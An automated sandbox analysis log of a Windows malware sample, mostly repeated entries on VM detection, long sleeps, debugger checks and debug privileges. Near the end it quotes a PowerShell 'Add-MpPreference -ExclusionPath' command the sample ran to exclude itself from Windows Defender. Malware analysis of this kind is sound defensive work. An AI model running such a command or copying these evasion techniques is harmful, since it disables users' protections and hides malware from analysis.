Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 23F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 7280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 8280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 8430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 9430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 11D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5879	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3799	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Window / User API: threadDelayed 8472	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Window / User API: threadDelayed 1363	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe TID: 6156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe TID: 3636	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088238454.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088238454.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
